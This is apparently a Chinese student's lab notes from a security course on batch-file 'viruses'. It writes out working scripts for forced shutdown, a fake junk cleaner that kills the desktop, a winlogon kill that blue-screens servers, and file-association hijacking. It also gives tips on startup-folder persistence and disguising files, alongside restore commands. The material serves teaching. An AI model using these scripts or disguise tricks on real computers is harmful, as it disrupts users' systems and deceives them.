病毒制作实践小记:运行关机、蓝屏炸弹、进程关闭、拓展名病毒 | 您所在的位置:网站首页 › qq病毒整蛊文件夹在哪 › 病毒制作实践小记:运行关机、蓝屏炸弹、进程关闭、拓展名病毒 |
病毒制作实践小记:运行关机、蓝屏炸弹、进程关闭、拓展名病毒
一、前言二、时间过程详细小记1、关机bat脚本实践步骤记录:2、最简单的蓝屏炸弹文件3、进程关闭病毒关于ntsd方法一:利用进程的PID结束进程方法二:利用进程名结束进程4、扩展名病毒解决方法:拓展思考
三、小啊呜有话说
叮嘟!这里是小啊呜的学习课程资料整理。好记性不如烂笔头,今天也是努力进步的一天。一起加油进阶吧!
一、前言
信息安全技术实践课之计算机病毒与黑客实验中相关实践小记。
建议所有相关操作都在虚拟机中完成。
希望这篇基础文章对大家有所帮助,更希望大家提高安全意识,学会相关防范,也欢迎大家讨论。
二、时间过程详细小记
1、关机bat脚本
关机bat脚本主要是调用“shutdown”实现关机。 其基本步骤如下: 新建文本文档 输入 shutdown -s -t 600 把txt改成bat如下图所示,运行CMD可以查看shutdown命令的基本用法。 基本命令为: shutdown -s -t 600 //现在让系统600秒之后关机 shutdown -a //终止关闭计算机 实践步骤记录:1、新建“test.bat”并填写“ shutdown -s -t 600”,某些系统需要在“文件夹选项”中,显示“隐藏已知文件类型的扩展名”。 把txt改成bat 2、双击BAT文件即运行关机。 运行结果如下图所示: 3、如果需要取消,还是在CMD黑框中输入“shutdown -a”命令。 2、最简单的蓝屏炸弹文件这是一个伪装垃圾清理的批处理代码。 该命令是杀死进程: “/im explorer.exe”表示要杀死的进程名称,关闭桌面; “/f”表示强制杀死;“>nul”表示在屏幕上不要输出任何信息。 taskkill /im explorer.exe /f >nul 2>nul完整代码如下所示,其中“Start c:\windows\expolrer.exe”表示继续开启桌面,“ping -n 5 127.0.0.1>nul”用于消耗时间。 TEST.bat @echo off title 系统垃圾清理 color 1f echo =====若有杀毒软件恶意拦截,请选择【允许程序的所有操作】==== echo. echo. echo. echo =====垃圾清理中,请不要关闭窗口========= echo. ping -n 5 127.0.0.1>nul taskkill /im explorer.exe /f >nul 2>nul echo. echo =====拐了,你的系统已经废了======= echo. ping -n 5 127.0.0.1>nul echo. Start c:\windows\explorer.exe echo. echo =====已经修复好!是不是吓坏了!!O(∩_∩)O========== pause运行该批处理程序,桌面会消失,如下图所示。 过一会桌面又会恢复。 这里由于桌面设置了壁纸自动切换,所以不用在意壁纸的不同。 3、进程关闭病毒相关步骤如下: 1、新建文本文档 2、输入:ntsd -c q -pn winlogon.exe,表示强制杀死进程 3、工具->文件夹选项->查看->“隐藏已知文件类型的扩展名”勾选 4、txt修改为bat 5、开始->程序->启动,打开game.bat文件黑客很少攻击个人,一般攻击服务器,该命令对2003的服务器特别有杀伤力 双击之后,服务器直接蓝屏显示并重启。 关于ntsdntsd从Windows 2000开始就是系统自带的进程调试工具,在system32目录下。ntsd的功能非常的强大,用法也比较复杂,但如果只用来结束一些进程,那就比较简单了。 在Windows中只有System、SMSS.EXE和CSRSS.EXE不能杀。前两个是纯内核态的,最后那个是Win32子系统,ntsd本身需要它。lsass.exe也不要杀掉,它是负责本地账户安全的。被调试器附着的进程会随调试器一起退出,所以可以用来在命令行下终止进程。 打开cmd 后输入以下命令就可以结束进程: 方法一:利用进程的PID结束进程 命令格式:ntsd -c q -p pid 命令范例:ntsd -c q -p 1332 (结束explorer.exe进程)范例详解:explorer.exe的pid为1332,但是如何获取进程的pid呢? 在CMD下输入TASKLIST就可以获取当前任务管理器所有进程的PID。 或者打开任务管理器,在菜单栏,选择“查看”->“选择列”,在打开的选择项窗口中将“PID(进程标识符)”项选择钩上,这样任务管理器的进程中就会多出PID一项了。PID的分配并不固定,是在进程启动是由系统随机分配的,所以进程每次启动的进程一般都不会一样。 方法二:利用进程名结束进程 命令格式:ntsd -c q -pn xxxx.exe (xxxx.exe 为进程名,exe不能省) 命令范例:ntsd -c q -pn explorer.exe另外的能结束进程的DOS命令还有taskkill和tskill命令。 4、扩展名病毒将文件格式修改或文档加密都是常见的病毒,比如永恒之蓝、勒索病毒等,它们就是将电脑内的所有资料、文档加密,当你要打开文件时,需要密码,此时通过比特币付费进行勒索。 扩展名病毒是将exe文件修改为txt文档。当遇到可执行的exe文件,会认为它是一个txt文档,用记事本打开,导致可执行程序运行不起来,这是就是这个病毒的原理。 相关步骤如下: 1、新建文本文档 2、增加代码:assoc.exe=txtfile 3、工具->文件夹选项->查看->“隐藏已知文件类型的扩展名”勾选 4、txt修改为bat 5、开始->程序->启动,打开bat文件 6、双击运行bat文件之后,我们的可执行文件就变成了txt文件。 此时系统认为exe就是txt程序,把系统的关联搞混乱了,它恢复起来很麻烦。记得把文件放到启动菜单哦! EXE程序打开如下图所示。 需要执行下面的命令还原exe文件。 assoc.exe=exefile 解决方法: 如果您不幸中了该病毒,怎么解决呢?如下图所示,还原所有正确关联即可。 assoc.txt=txtfile
效果如下图所示。 可怜的壁纸还是要重新设置啦! 拓展思考其他所有文件格式都转换为txt文件,如下所示。此时,如果隐藏文件扩展名,甚至可以修改图标伪装成目标应用,当用户点击时会执行这些破坏;但由于不知道目标是否有隐藏文件扩展名,还是不建议这种“笨”方法。 assoc .htm=txtfile assoc .dat=txtfile assoc .com=txtfile assoc .rar=txtfile assoc .gho=txtfile assoc .mvb=txtfile ... 三、小啊呜有话说 今天收获良多呀!Ending! 更多课程知识学习记录随后再来吧! 就酱,嘎啦!注: 1、人生在勤,不索何获。 2、病毒详解及批处理病毒制作详细文章参见: https://blog.csdn.net/csdnnews/article/details/104322825 |
CopyRight 2018-2019 实验室设备网 版权所有 |